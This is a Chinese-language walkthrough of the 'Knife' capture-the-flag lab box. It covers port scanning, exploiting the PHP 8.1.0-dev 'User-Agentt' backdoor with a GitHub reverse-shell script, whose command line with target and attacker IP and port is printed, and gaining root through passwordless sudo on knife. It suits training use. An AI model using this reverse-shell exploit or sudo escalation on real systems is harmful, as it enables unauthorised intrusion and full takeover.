Linux/Knife

Knife

Enumeration

nmap

第一次扫描发现系统对外开放了22和80端口,端口详细信息如下

系统对外开放了2个端口,22的ssh和80的http,先访问web看看

单看该服务,并没有发现有趣的东西,wappalyzer显示php版本为8.1.0

PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution

搜索发现该版本php存在后门漏洞,可以远程执行代码

首先将该漏洞利用脚本下载到工作目录,我这里用了github的脚本

然后执行python脚本,输入url,本机ip,设置监听端口,在本地开启监听,然后执行python脚本

usage: revshell_php_8.1.0-dev.py [-h] <target URL> <attacker IP> <attacker PORT> python revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.14.3 4444

在python执行界面中没有反应,但是监听端获取到shell

Privilege Escalation

直接使用sudo -l发现可以使用root权限执行knife程序,且不需要密码

在gtfobins中发现knife可以利用,如图

执行指令即可获取root权限

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-03-11 01:38:05       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-03-11 01:38:05       100 阅读
  3. 在Django里面运行非项目文件

    2024-03-11 01:38:05       82 阅读
  4. Python语言-面向对象

    2024-03-11 01:38:05       91 阅读

热门阅读

  1. springboot集成 mongodb以及mongodb简单工具类

    2024-03-11 01:38:05       33 阅读
  2. python xml 解析

    2024-03-11 01:38:05       42 阅读
  3. 设计模式: 模板方法模式

    2024-03-11 01:38:05       43 阅读
  4. Linux命令

    2024-03-11 01:38:05       48 阅读
  5. 如何利用python实现自己的modbus-tcp库

    2024-03-11 01:38:05       45 阅读
  6. 《TCP/IP详解 卷一》第14章 TCP超时与重传

    2024-03-11 01:38:05       39 阅读
  7. Android学习笔记 Dialog

    2024-03-11 01:38:05       40 阅读
  8. 【Mysql优化】

    2024-03-11 01:38:05       42 阅读
  9. LeetCode 128 最长连续序列

    2024-03-11 01:38:05       40 阅读